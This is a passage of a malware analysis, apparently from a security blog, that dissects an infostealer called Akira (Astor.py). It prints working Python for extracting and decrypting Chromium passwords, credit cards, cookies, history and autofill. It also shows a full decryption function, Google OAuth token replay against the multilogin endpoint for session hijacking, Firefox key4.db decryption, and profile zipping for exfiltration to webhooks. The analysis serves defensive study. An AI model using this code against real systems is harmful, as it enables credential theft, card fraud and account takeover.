clear_pwd))\n",[63,14071,14072,14077,14082,14087,14092,14097,14102,14107,14112,14117],{"__ignoreMap":65},[102,14073,14074],{"class":104,"line":105},[102,14075,14076],{},"for root, _, files in os.walk(self.BrowserPath):\n",[102,14078,14079],{"class":104,"line":111},[102,14080,14081],{},"    for file in files:\n",[102,14083,14084],{"class":104,"line":329},[102,14085,14086],{},"        if file.lower() == \"login data\":\n",[102,14088,14089],{"class":104,"line":346},[102,14090,14091],{},"            # Copy DB → open → extract rows\n",[102,14093,14094],{"class":104,"line":650},[102,14095,14096],{},"            results = cursor.execute(\n",[102,14098,14099],{"class":104,"line":656},[102,14100,14101],{},"                \"SELECT origin_url, username_value, password_value FROM logins\"\n",[102,14103,14104],{"class":104,"line":662},[102,14105,14106],{},"            ).fetchall()\n",[102,14108,14109],{"class":104,"line":668},[102,14110,14111],{},"            for url, user, pwd_blob in results:\n",[102,14113,14114],{"class":104,"line":674},[102,14115,14116],{},"                clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n",[102,14118,14119],{"class":104,"line":680},[102,14120,14121],{},"                passwords.append((url, user, clear_pwd))\n",[1254,14123,14124,14137,14143,14151,14168],{},[1257,14125,14126,14129,14130,14132,14133,14136],{},[251,14127,14128],{},"Locates"," every ",[63,14131,8280],{}," SQLite database under the browser’s ",[63,14134,14135],{},"User Data"," folder.",[1257,14138,14139,14142],{},[251,14140,14141],{},"Copies"," to a temp file to avoid browser locks.",[1257,14144,14145,1061,14148,1013],{},[251,14146,14147],{},"SQL Query",[63,14149,14150],{},"SELECT origin_url, username_value, password_value FROM logins",[1257,14152,14153,14156,14157,14160,14161,1304,14164,14167],{},[251,14154,14155],{},"Decrypts"," each ",[63,14158,14159],{},"password_value"," blob via AES‑GCM (",[63,14162,14163],{},"v10",[63,14165,14166],{},"v11",") or Windows DPAPI fallback.",[1257,14169,14170,14173,14174,1013],{},[251,14171,14172],{},"Writes"," output to ",[63,14175,14176],{},"Passwords/\u003CBrowserName> Passwords.txt",[186,14178,14180,14181,1288],{"id":14179},"_743-credit-card-dumper-chromiumgetcreditcards","7.4.3 Credit Card Dumper (",[63,14182,14183],{},"Chromium.GetCreditCards",[12,14185,192],{},[12,14187,14188],{},"Here, the stealer accesses stored credit card data from each browser profile’s Web Data file. It focuses on extracting expiration details and encrypted credit card numbers, which are then decrypted with the same logic as passwords. Although CVV codes are typically not stored, the recovered information can still be misused for card-not-present fraud.",[56,14190,14192],{"className":12155,"code":14191,"language":12157,"meta":65,"style":65},"results = cursor.execute(\n    \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n).fetchall()\nfor month, year, enc_cc in results:\n    cc_number = self.Decrypt(enc_cc, encryptionKey)\n    ccs.append((cc_number, month, year))\n",[63,14193,14194,14199,14204,14209,14214,14219],{"__ignoreMap":65},[102,14195,14196],{"class":104,"line":105},[102,14197,14198],{},"results = cursor.execute(\n",[102,14200,14201],{"class":104,"line":111},[102,14202,14203],{},"    \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n",[102,14205,14206],{"class":104,"line":329},[102,14207,14208],{},").fetchall()\n",[102,14210,14211],{"class":104,"line":346},[102,14212,14213],{},"for month, year, enc_cc in results:\n",[102,14215,14216],{"class":104,"line":650},[102,14217,14218],{},"    cc_number = self.Decrypt(enc_cc, encryptionKey)\n",[102,14220,14221],{"class":104,"line":656},[102,14222,14223],{},"    ccs.append((cc_number, month, year))\n",[1254,14225,14226,14235,14242,14250],{},[1257,14227,14228,14231,14232,14234],{},[251,14229,14230],{},"Targets"," the ",[63,14233,8283],{}," SQLite stores under each profile.",[1257,14236,14237,1061,14239,1013],{},[251,14238,14147],{},[63,14240,14241],{},"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards",[1257,14243,14244,540,14246,14249],{},[251,14245,14155],{},[63,14247,14248],{},"card_number_encrypted"," exactly like the password blobs.",[1257,14251,14252,14255,14256,1013],{},[251,14253,14254],{},"Outputs"," to ",[63,14257,14258],{},"CreditCards/\u003CBrowserName> CreditCards.txt",[186,14260,14262,14263,1288],{"id":14261},"_744-cookie-dumper-chromiumgetcookies","7.4.4 Cookie Dumper (",[63,14264,14265],{},"Chromium.GetCookies",[12,14267,192],{},[12,14269,14270],{},"Cookies, especially session cookies, are prime targets for account hijacking without passwords. This module dumps all cookie files across profiles, decrypts them, and collects essential metadata like domain, name, and expiration. Combined with fingerprinting, these cookies can enable seamless replay attacks on authenticated services.",[56,14272,14274],{"className":12155,"code":14273,"language":12157,"meta":65,"style":65},"results = cursor.execute(\n    \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n).fetchall()\nfor host, name, path, blob, expiry in results:\n    cookie_val = self.Decrypt(blob, encryptionKey)\n    cookies.append((host, name, path, cookie_val, expiry))\n",[63,14275,14276,14280,14285,14289,14294,14299],{"__ignoreMap":65},[102,14277,14278],{"class":104,"line":105},[102,14279,14198],{},[102,14281,14282],{"class":104,"line":111},[102,14283,14284],{},"    \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n",[102,14286,14287],{"class":104,"line":329},[102,14288,14208],{},[102,14290,14291],{"class":104,"line":346},[102,14292,14293],{},"for host, name, path, blob, expiry in results:\n",[102,14295,14296],{"class":104,"line":650},[102,14297,14298],{},"    cookie_val = self.Decrypt(blob, encryptionKey)\n",[102,14300,14301],{"class":104,"line":656},[102,14302,14303],{},"    cookies.append((host, name, path, cookie_val, expiry))\n",[1254,14305,14306,14314,14322,14330],{},[1257,14307,14308,14129,14311,14313],{},[251,14309,14310],{},"Scans",[63,14312,13987],{}," SQLite database.",[1257,14315,14316,540,14319,1013],{},[251,14317,14318],{},"Selects",[63,14320,14321],{},"host_key, name, path, encrypted_value, expires_utc",[1257,14323,14324,14156,14326,14329],{},[251,14325,14155],{},[63,14327,14328],{},"encrypted_value"," blob to reveal the actual cookie string.",[1257,14331,14332,14335,14336,1013],{},[251,14333,14334],{},"Saves"," into ",[63,14337,14338],{},"Cookies/\u003CBrowserName> Cookies.txt",[186,14340,14342,14343,1288],{"id":14341},"_745-google-session-dumper-chromiumdump_google_sessions","7.4.5 Google Session Dumper (",[63,14344,14345],{},"Chromium.dump_google_sessions",[12,14347,192],{},[12,14349,14350],{},"One of the more advanced components, this routine decrypts stored OAuth tokens from the token_service table. By replaying them via Google’s multilogin endpoint, the malware can regenerate active session cookies—allowing attackers to hijack Google accounts without credentials. This illustrates how access tokens have become prime targets in modern stealers.",[56,14352,14354],{"className":12155,"code":14353,"language":12157,"meta":65,"style":65},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\nfor service, blob in cursor.fetchall():\n    iv = blob[3:15]\n    ciphertext = blob[15:-16]\n    cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n    token = cipher.decrypt(ciphertext).decode()\n    # Replays via POST to OAuth endpoint\n    response = requests.post(\n        \"https://accounts.google.com/oauth/multilogin\",\n        headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n        data={\"source\": \"com.google.Drive\"}\n    )\n    save each account’s cookies to file\n",[63,14355,14356,14361,14366,14371,14376,14381,14386,14391,14396,14401,14406,14411,14415],{"__ignoreMap":65},[102,14357,14358],{"class":104,"line":105},[102,14359,14360],{},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\n",[102,14362,14363],{"class":104,"line":111},[102,14364,14365],{},"for service, blob in cursor.fetchall():\n",[102,14367,14368],{"class":104,"line":329},[102,14369,14370],{},"    iv = blob[3:15]\n",[102,14372,14373],{"class":104,"line":346},[102,14374,14375],{},"    ciphertext = blob[15:-16]\n",[102,14377,14378],{"class":104,"line":650},[102,14379,14380],{},"    cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n",[102,14382,14383],{"class":104,"line":656},[102,14384,14385],{},"    token = cipher.decrypt(ciphertext).decode()\n",[102,14387,14388],{"class":104,"line":662},[102,14389,14390],{},"    # Replays via POST to OAuth endpoint\n",[102,14392,14393],{"class":104,"line":668},[102,14394,14395],{},"    response = requests.post(\n",[102,14397,14398],{"class":104,"line":674},[102,14399,14400],{},"        \"https://accounts.google.com/oauth/multilogin\",\n",[102,14402,14403],{"class":104,"line":680},[102,14404,14405],{},"        headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n",[102,14407,14408],{"class":104,"line":12692},[102,14409,14410],{},"        data={\"source\": \"com.google.Drive\"}\n",[102,14412,14413],{"class":104,"line":12698},[102,14414,13622],{},[102,14416,14417],{"class":104,"line":12704},[102,14418,14419],{},"    save each account’s cookies to file\n",[1254,14421,14422,14438,14448,14458],{},[1257,14423,14424,540,14427,14430,14431,14434,14435,14437],{},[251,14425,14426],{},"Fetches",[63,14428,14429],{},"service"," and raw ",[63,14432,14433],{},"encrypted_token"," from ",[63,14436,8283],{}," clone.",[1257,14439,14440,14443,14444,14447],{},[251,14441,14442],{},"AES‑GCM decryption"," using the browser’s ",[63,14445,14446],{},"Local State"," key.",[1257,14449,14450,14453,14454,14457],{},[251,14451,14452],{},"Replays"," decrypted tokens in a POST to Google’s ",[63,14455,14456],{},"multilogin"," API to reconstruct valid OAuth cookies.",[1257,14459,14460,14462,14463,1013],{},[251,14461,14172],{}," per-account session files under ",[63,14464,14465],{},"Cookies/\u003Cdisplay_email> Google Session.txt",[186,14467,14469,14470,1288],{"id":14468},"_746-history-dumper-chromiumgethistory","7.4.6 History Dumper (",[63,14471,14472],{},"Chromium.GetHistory",[12,14474,192],{},[12,14476,14477],{},"This function extracts browsing history entries including URL, title, and visit frequency. Beyond privacy invasion, this data helps attackers understand victim behavior, identify high-value targets (e.g., banking portals), or tailor social engineering payloads.",[56,14479,14481],{"className":12155,"code":14480,"language":12157,"meta":65,"style":65},"results = cursor.execute(\n    \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n).fetchall()\nhistory.sort(key=lambda x: x[3], reverse=True)\nreturn [(url, title, count) for url, title, count, _ in history]\n",[63,14482,14483,14487,14492,14496,14501],{"__ignoreMap":65},[102,14484,14485],{"class":104,"line":105},[102,14486,14198],{},[102,14488,14489],{"class":104,"line":111},[102,14490,14491],{},"    \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n",[102,14493,14494],{"class":104,"line":329},[102,14495,14208],{},[102,14497,14498],{"class":104,"line":346},[102,14499,14500],{},"history.sort(key=lambda x: x[3], reverse=True)\n",[102,14502,14503],{"class":104,"line":650},[102,14504,14505],{},"return [(url, title, count) for url, title, count, _ in history]\n",[1254,14507,14508,14519,14529],{},[1257,14509,14510,540,14512,14515,14516,14518],{},[251,14511,14318],{},[63,14513,14514],{},"url, title, visit_count, last_visit_time"," from every ",[63,14517,14039],{}," DB.",[1257,14520,14521,14524,14525,14528],{},[251,14522,14523],{},"Sorts"," entries by ",[63,14526,14527],{},"last_visit_time"," descending.",[1257,14530,14531,540,14533,1013],{},[251,14532,14254],{},[63,14534,14535],{},"History/\u003CBrowserName> History.txt",[186,14537,14539,14540,1288],{"id":14538},"_747-autofill-dumper-chromiumgetautofills","7.4.7 Autofill Dumper (",[63,14541,14542],{},"Chromium.GetAutofills",[12,14544,192],{},[12,14546,14547],{},"Autofill entries—like addresses, names, emails, and sometimes payment-related data—are scraped from the browser’s Web Data storage. These values may not seem critical, but when aggregated, they offer a rich profile of the victim’s identity and behavior.",[56,14549,14551],{"className":12155,"code":14550,"language":12157,"meta":65,"style":65},"results = cursor.execute(\n    \"SELECT name, value FROM autofill\"\n).fetchall()\nfor field, value in results:\n    autofills.append((field.strip(), value.strip()))\n",[63,14552,14553,14557,14562,14566,14571],{"__ignoreMap":65},[102,14554,14555],{"class":104,"line":105},[102,14556,14198],{},[102,14558,14559],{"class":104,"line":111},[102,14560,14561],{},"    \"SELECT name, value FROM autofill\"\n",[102,14563,14564],{"class":104,"line":329},[102,14565,14208],{},[102,14567,14568],{"class":104,"line":346},[102,14569,14570],{},"for field, value in results:\n",[102,14572,14573],{"class":104,"line":650},[102,14574,14575],{},"    autofills.append((field.strip(), value.strip()))\n",[1254,14577,14578,14591],{},[1257,14579,14580,14582,14583,14586,14587,14590],{},[251,14581,14426],{}," form-fill entries: ",[63,14584,14585],{},"name, value"," from the ",[63,14588,14589],{},"web data"," file.",[1257,14592,14593,14595,14596,1013],{},[251,14594,14172],{}," out as ",[63,14597,14598],{},"Autofill/\u003CBrowserName> Autofill.txt",[186,14600,14602,14603,14605,14606,1288],{"id":14601},"_748-firefox-profile-grabber-geckodriver-grabfirefoxprofiles","7.4.8 Firefox Profile Grabber (",[63,14604,13913],{}," & ",[63,14607,14608],{},"grabFirefoxProfiles",[12,14610,192],{},[12,14612,14613],{},"Unlike the granular Chromium routines, this function opts for a broad approach: it compresses the entire Firefox profile directory—including saved logins, cookies, and bookmarks—and exfiltrates it wholesale. This ensures attackers can analyze or extract data offline, bypassing decryption hurdles with known NSS tooling.",[56,14615,14617],{"className":12155,"code":14616,"language":12157,"meta":65,"style":65},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n    for root, dirs, files in os.walk(source_path):\n        zipf.write(each file)\n# Upload via GoFile/File.io, then POST via attacker webhooks\n",[63,14618,14619,14624,14629,14634],{"__ignoreMap":65},[102,14620,14621],{"class":104,"line":105},[102,14622,14623],{},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n",[102,14625,14626],{"class":104,"line":111},[102,14627,14628],{},"    for root, dirs, files in os.walk(source_path):\n",[102,14630,14631],{"class":104,"line":329},[102,14632,14633],{},"        zipf.write(each file)\n",[102,14635,14636],{"class":104,"line":346},[102,14637,14638],{},"# Upload via GoFile/File.io, then POST via attacker webhooks\n",[1254,14640,14641,14651,14661],{},[1257,14642,14643,14646,14647,14650],{},[251,14644,14645],{},"Zips"," the entire ",[63,14648,14649],{},"%APPDATA%\\Mozilla\\Firefox\\Profiles"," directory.",[1257,14652,14653,14656,14657,14660],{},[251,14654,14655],{},"Names"," it ",[63,14658,14659],{},"%TEMP%\\\u003CComputerName>_Firefox_profiles.zip"," and sends the download link over the same webhook channels.",[1257,14662,14663,14666,14667,805,14670,805,14673,14676],{},[251,14664,14665],{},"Also"," invokes the same SQLite-based extraction functions (",[63,14668,14669],{},"logins.json",[63,14671,14672],{},"cookies.sqlite",[63,14674,14675],{},"places.sqlite",") against each Firefox profile using the NSS decryption routines already present.",[186,14678,14680],{"id":14679},"_749-extraction-summary","7.4.9 Extraction Summary",[12,14682,192],{},[12,14684,14685,14686,805,14688,805,14690,805,14692,9866,14694,14697,14698,14701,14702,14704,14705,805,14707,9866,14709,14711,14712,14715],{},"Astor.py orchestrates a comprehensive browser compromise by systematically harvesting every credential and session artifact across Chromium-based and Firefox clients. It locates and safely copies each SQLite store—",[63,14687,8280],{},[63,14689,8283],{},[63,14691,13987],{},[63,14693,14039],{},[63,14695,14696],{},"autofill","—then runs targeted SQL queries to extract URLs, usernames, passwords, credit-card details, cookies, browsing history, and form-fill entries. Passwords and payment data are decrypted via AES-GCM (or Windows DPAPI fallback), while cookies are similarly unwrapped to reveal their plaintext values. For Google accounts, encrypted OAuth tokens from ",[63,14699,14700],{},"token_service"," are decrypted and replayed against the ",[63,14703,14456],{}," API to regenerate live session cookies. Finally, Firefox profiles are archived wholesale (including ",[63,14706,14669],{},[63,14708,14672],{},[63,14710,14675],{},") and delivered as ZIPs, ensuring no artifact is left behind. This end-to-end pipeline runs silently under ",[63,14713,14714],{},"%TEMP%\\\u003CComputerName>",", producing neatly organized output files for every data category.",[41,14717,14719],{"id":14718},"_75-decryption-logic","7.5 Decryption Logic",[12,14721,47],{},[12,14723,14724],{},"Modern browsers like Chrome and Edge encrypt sensitive data—such as passwords, cookies, and credit card details—before storing them locally. Akira includes built-in decryption routines tailored to handle both legacy and current Chromium encryption methods. This ensures it can extract cleartext data regardless of the system's patch level or browser version.",[12,14726,14727],{},"At the core of this process is the extraction and decryption of the browser’s master encryption key, stored in a file called Local State. Depending on the browser version and Windows build, Akira dynamically selects the appropriate decryption method:",[12,14729,14730],{},"DPAPI (Data Protection API) is used on older systems, where Chrome stores secrets protected by the current user's Windows credentials.",[12,14732,14733],{},"AES-GCM is used on modern Chromium builds, where a randomly generated master key is itself encrypted with DPAPI, then used for in-app encryption of user data.",[12,14735,14736],{},"By first decrypting the Local State master key, Akira gains the ability to unlock all browser secrets—paving the way for extracting credentials, tokens, cookies, and more.",[12,14738,14739],{},[251,14740,14741],{},"Key extraction",[56,14743,14745],{"className":12155,"code":14744,"language":12157,"meta":65,"style":65},"local_state_path = os.path.join(user_path, \"Local State\")\nwith open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n    local_state = json.load(f)\nmaster_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[63,14746,14747,14752,14757,14762],{"__ignoreMap":65},[102,14748,14749],{"class":104,"line":105},[102,14750,14751],{},"local_state_path = os.path.join(user_path, \"Local State\")\n",[102,14753,14754],{"class":104,"line":111},[102,14755,14756],{},"with open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n",[102,14758,14759],{"class":104,"line":329},[102,14760,14761],{},"    local_state = json.load(f)\n",[102,14763,14764],{"class":104,"line":346},[102,14765,14766],{},"master_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[12,14768,14769],{},[251,14770,14771],{},"Decryption (AES-GCM):",[56,14773,14775],{"className":12155,"code":14774,"language":12157,"meta":65,"style":65},"nonce = value[3:15]\nciphertext = value[15:-16]\ntag = value[-16:]\ncipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\ndecrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[63,14776,14777,14782,14787,14792,14797],{"__ignoreMap":65},[102,14778,14779],{"class":104,"line":105},[102,14780,14781],{},"nonce = value[3:15]\n",[102,14783,14784],{"class":104,"line":111},[102,14785,14786],{},"ciphertext = value[15:-16]\n",[102,14788,14789],{"class":104,"line":329},[102,14790,14791],{},"tag = value[-16:]\n",[102,14793,14794],{"class":104,"line":346},[102,14795,14796],{},"cipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\n",[102,14798,14799],{"class":104,"line":650},[102,14800,14801],{},"decrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[12,14803,14804,14805,1013],{},"If fallback to DPAPI is needed (on older systems), it uses ",[63,14806,14807],{},"win32crypt.CryptUnprotectData()",[12,14809,14810,14816],{},[251,14811,14812,14813,1550],{},"Explanation of ",[63,14814,14815],{},"decrypt_password_blob","\nThis function demonstrates how Akira Stealer decrypts each saved password value from Chromium-based browsers. It handles two cases:",[3259,14818,14819,14829],{},[1257,14820,14821,14824,14825,14828],{},[251,14822,14823],{},"Windows DPAPI blobs"," (older or non-GCM encrypted data): Falls back to the system call ",[63,14826,14827],{},"CryptUnprotectData",", which uses the user’s Windows credentials to decrypt.",[1257,14830,14831,14834,14835,14838],{},[251,14832,14833],{},"AES-GCM encrypted blobs"," (Chrome v10/v11 format): Parses the version header, extracts the IV and authentication tag, and uses the ",[63,14836,14837],{},"cryptography"," library to decrypt the payload securely.",[56,14840,14842],{"className":12155,"code":14841,"language":12157,"meta":65,"style":65},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\n\n\ndef decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n    \"\"\"\n    Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n\n    Parameters:\n    - buffer: raw encrypted blob from the `password_value` field\n    - key: the master AES key retrieved via DPAPI from Local State\n\n    Returns:\n    - Decrypted UTF-8 plaintext password\n    \"\"\"\n    # 1) DPAPI fallback for non-AES-GCM blobs\n    if not buffer.startswith((b'v10', b'v11')):\n        # Uses Windows CryptUnprotectData under the hood\n        return CryptUnprotectData(buffer)\n\n    # 2) AES-GCM decryption for Chrome v10/v11 format:\n    # Bytes layout:\n    # [0:3]    = version header ('v10'/'v11')\n    # [3:15]   = initialization vector (IV)\n    # [15:-16] = ciphertext payload\n    # [-16:]   = GCM authentication tag\n    iv = buffer[3:15]\n    ciphertext = buffer[15:-16]\n    tag = buffer[-16:]\n\n    # Initialize AES-GCM cipher with extracted IV and tag\n    cipher = Cipher(\n        algorithms.AES(key),\n        modes.GCM(iv, tag),\n        backend=default_backend()\n    )\n    decryptor = cipher.decryptor()\n\n    # Perform decryption; raises if authentication fails\n    plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n\n    # Decode to UTF-8, ignoring any stray errors\n    return plaintext.decode('utf-8', errors='ignore')\n",[63,14843,14844,14849,14854,14858,14862,14867,14871,14876,14880,14885,14890,14895,14899,14904,14909,14913,14918,14923,14928,14933,14937,14942,14947,14952,14957,14962,14967,14972,14977,14982,14986,14991,14996,15001,15006,15011,15015,15020,15024,15029,15034,15038,15043],{"__ignoreMap":65},[102,14845,14846],{"class":104,"line":105},[102,14847,14848],{},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n",[102,14850,14851],{"class":104,"line":111},[102,14852,14853],{},"from cryptography.hazmat.backends import default_backend\n",[102,14855,14856],{"class":104,"line":329},[102,14857,11519],{"emptyLinePlaceholder":2181},[102,14859,14860],{"class":104,"line":346},[102,14861,11519],{"emptyLinePlaceholder":2181},[102,14863,14864],{"class":104,"line":650},[102,14865,14866],{},"def decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n",[102,14868,14869],{"class":104,"line":656},[102,14870,13496],{},[102,14872,14873],{"class":104,"line":662},[102,14874,14875],{},"    Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n",[102,14877,14878],{"class":104,"line":668},[102,14879,11519],{"emptyLinePlaceholder":2181},[102,14881,14882],{"class":104,"line":674},[102,14883,14884],{},"    Parameters:\n",[102,14886,14887],{"class":104,"line":680},[102,14888,14889],{},"    - buffer: raw encrypted blob from the `password_value` field\n",[102,14891,14892],{"class":104,"line":12692},[102,14893,14894],{},"    - key: the master AES key retrieved via DPAPI from Local State\n",[102,14896,14897],{"class":104,"line":12698},[102,14898,11519],{"emptyLinePlaceholder":2181},[102,14900,14901],{"class":104,"line":12704},[102,14902,14903],{},"    Returns:\n",[102,14905,14906],{"class":104,"line":12710},[102,14907,14908],{},"    - Decrypted UTF-8 plaintext password\n",[102,14910,14911],{"class":104,"line":12716},[102,14912,13496],{},[102,14914,14915],{"class":104,"line":12722},[102,14916,14917],{},"    # 1) DPAPI fallback for non-AES-GCM blobs\n",[102,14919,14920],{"class":104,"line":12728},[102,14921,14922],{},"    if not buffer.startswith((b'v10', b'v11')):\n",[102,14924,14925],{"class":104,"line":12734},[102,14926,14927],{},"        # Uses Windows CryptUnprotectData under the hood\n",[102,14929,14930],{"class":104,"line":12740},[102,14931,14932],{},"        return CryptUnprotectData(buffer)\n",[102,14934,14935],{"class":104,"line":12746},[102,14936,11519],{"emptyLinePlaceholder":2181},[102,14938,14939],{"class":104,"line":12752},[102,14940,14941],{},"    # 2) AES-GCM decryption for Chrome v10/v11 format:\n",[102,14943,14944],{"class":104,"line":12758},[102,14945,14946],{},"    # Bytes layout:\n",[102,14948,14949],{"class":104,"line":12764},[102,14950,14951],{},"    # [0:3]    = version header ('v10'/'v11')\n",[102,14953,14954],{"class":104,"line":12770},[102,14955,14956],{},"    # [3:15]   = initialization vector (IV)\n",[102,14958,14959],{"class":104,"line":12776},[102,14960,14961],{},"    # [15:-16] = ciphertext payload\n",[102,14963,14964],{"class":104,"line":13442},[102,14965,14966],{},"    # [-16:]   = GCM authentication tag\n",[102,14968,14969],{"class":104,"line":13447},[102,14970,14971],{},"    iv = buffer[3:15]\n",[102,14973,14974],{"class":104,"line":13452},[102,14975,14976],{},"    ciphertext = buffer[15:-16]\n",[102,14978,14979],{"class":104,"line":13457},[102,14980,14981],{},"    tag = buffer[-16:]\n",[102,14983,14984],{"class":104,"line":13463},[102,14985,11519],{"emptyLinePlaceholder":2181},[102,14987,14988],{"class":104,"line":13468},[102,14989,14990],{},"    # Initialize AES-GCM cipher with extracted IV and tag\n",[102,14992,14993],{"class":104,"line":13473},[102,14994,14995],{},"    cipher = Cipher(\n",[102,14997,14998],{"class":104,"line":13478},[102,14999,15000],{},"        algorithms.AES(key),\n",[102,15002,15003],{"class":104,"line":13483},[102,15004,15005],{},"        modes.GCM(iv, tag),\n",[102,15007,15008],{"class":104,"line":13488},[102,15009,15010],{},"        backend=default_backend()\n",[102,15012,15013],{"class":104,"line":13493},[102,15014,13622],{},[102,15016,15017],{"class":104,"line":13499},[102,15018,15019],{},"    decryptor = cipher.decryptor()\n",[102,15021,15022],{"class":104,"line":13505},[102,15023,11519],{"emptyLinePlaceholder":2181},[102,15025,15026],{"class":104,"line":13511},[102,15027,15028],{},"    # Perform decryption; raises if authentication fails\n",[102,15030,15031],{"class":104,"line":13516},[102,15032,15033],{},"    plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n",[102,15035,15036],{"class":104,"line":13521},[102,15037,11519],{"emptyLinePlaceholder":2181},[102,15039,15040],{"class":104,"line":13526},[102,15041,15042],{},"    # Decode to UTF-8, ignoring any stray errors\n",[102,15044,15045],{"class":104,"line":13531},[102,15046,15047],{},"    return plaintext.decode('utf-8', errors='ignore')\n",[41,15049,15051],{"id":15050},"_76-session-token-hijacking","7.6 Session Token Hijacking",[12,15053,47],{},[12,15055,15056,15057,15060],{},"Akira doesn’t stop at passive data collection—it actively hijacks live session tokens to impersonate victims in real time. After extracting encrypted tokens from browser storage, it reconstructs the required authorization header and replays a ",[251,15058,15059],{},"MultiLogin"," request against Google’s OAuth endpoint. The code snippet below illustrates this process:",[56,15062,15064],{"className":12155,"code":15063,"language":12157,"meta":65,"style":65},"# Build SAPISIDHASH header for Google services\norigin = \"https://accounts.google.com\"\ntimestamp = int(time.time())\n# Compute SHA1 of \"timestamp origin SAPISID\"\npayload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\nsignature = hashlib.sha1(payload).hexdigest()\nheaders = {\n    \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n    \"Content-Type\": \"application/json\"\n}\n# Replay MultiLogin to fetch valid session cookies\nresponse = requests.post(\n    \"https://accounts.google.com/accounts/multilogin\",\n    headers=headers,\n    json={\"continue\": \"https://mail.google.com\"}\n)\nif response.status_code == 200:\n    # Victim’s cookies now present in response.cookies\n    hijacked_cookies = response.cookies\n",[63,15065,15066,15071,15076,15081,15086,15091,15096,15101,15106,15111,15115,15120,15125,15130,15135,15140,15144,15149,15154],{"__ignoreMap":65},[102,15067,15068],{"class":104,"line":105},[102,15069,15070],{},"# Build SAPISIDHASH header for Google services\n",[102,15072,15073],{"class":104,"line":111},[102,15074,15075],{},"origin = \"https://accounts.google.com\"\n",[102,15077,15078],{"class":104,"line":329},[102,15079,15080],{},"timestamp = int(time.time())\n",[102,15082,15083],{"class":104,"line":346},[102,15084,15085],{},"# Compute SHA1 of \"timestamp origin SAPISID\"\n",[102,15087,15088],{"class":104,"line":650},[102,15089,15090],{},"payload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\n",[102,15092,15093],{"class":104,"line":656},[102,15094,15095],{},"signature = hashlib.sha1(payload).hexdigest()\n",[102,15097,15098],{"class":104,"line":662},[102,15099,15100],{},"headers = {\n",[102,15102,15103],{"class":104,"line":668},[102,15104,15105],{},"    \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n",[102,15107,15108],{"class":104,"line":674},[102,15109,15110],{},"    \"Content-Type\": \"application/json\"\n",[102,15112,15113],{"class":104,"line":680},[102,15114,10086],{},[102,15116,15117],{"class":104,"line":12692},[102,15118,15119],{},"# Replay MultiLogin to fetch valid session cookies\n",[102,15121,15122],{"class":104,"line":12698},[102,15123,15124],{},"response = requests.post(\n",[102,15126,15127],{"class":104,"line":12704},[102,15128,15129],{},"    \"https://accounts.google.com/accounts/multilogin\",\n",[102,15131,15132],{"class":104,"line":12710},[102,15133,15134],{},"    headers=headers,\n",[102,15136,15137],{"class":104,"line":12716},[102,15138,15139],{},"    json={\"continue\": \"https://mail.google.com\"}\n",[102,15141,15142],{"class":104,"line":12722},[102,15143,12911],{},[102,15145,15146],{"class":104,"line":12728},[102,15147,15148],{},"if response.status_code == 200:\n",[102,15150,15151],{"class":104,"line":12734},[102,15152,15153],{},"    # Victim’s cookies now present in response.cookies\n",[102,15155,15156],{"class":104,"line":12740},[102,15157,15158],{},"    hijacked_cookies = response.cookies\n",[12,15160,15161],{},"By replaying this request, Akira can impersonate the user’s Gmail, Drive, or any other Google service protected by a valid session—no credentials required. This technique leverages Google’s own token acceptance logic, making it nearly indistinguishable from legitimate client behavior.",[41,15163,15165],{"id":15164},"_77-firefox-decryption","7.7 Firefox Decryption",[12,15167,47],{},[12,15169,15170,15171,15174],{},"Gecko‑based browsers like Firefox encrypt saved credentials and cookies using a master key stored in ",[63,15172,15173],{},"key4.db",". Akira includes a stripped‑down decryption routine mirroring Mozilla’s NSS logic, handling both 3DES and AES‑CBC variants without triggering the master password prompt. Example usage:",[56,15176,15178],{"className":12155,"code":15177,"language":12157,"meta":65,"style":65},"# Load global Salt and encrypted item from key4.db\ndb = sqlite3.connect(profile_path + \"/key4.db\")\ncursor = db.cursor()\ncursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\nglobal_salt, item2 = cursor.fetchone()\n\n# Decode DER structure and derive key\ndecoded, _ = der_decode(item2)\nentry_salt = decoded[0][1][0].asOctets()\ncipher_text = decoded[1].asOctets()\n# Derive 3DES key\nkey = derive_3des_key(global_salt, master_password, entry_salt)\niv = decoded[0][1][1].asOctets()\n# Decrypt credentials\ncipher = DES3.new(key, DES3.MODE_CBC, iv)\nclear_password = unpad(cipher.decrypt(cipher_text))\n\nprint(\"Decrypted Firefox password:\", 